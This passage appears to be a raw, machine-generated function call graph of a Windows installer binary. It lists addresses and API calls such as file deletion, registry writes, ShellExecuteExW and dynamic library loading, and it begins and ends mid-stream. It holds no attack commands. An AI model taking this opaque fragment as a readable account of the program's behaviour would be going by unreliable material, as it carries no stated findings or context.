3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 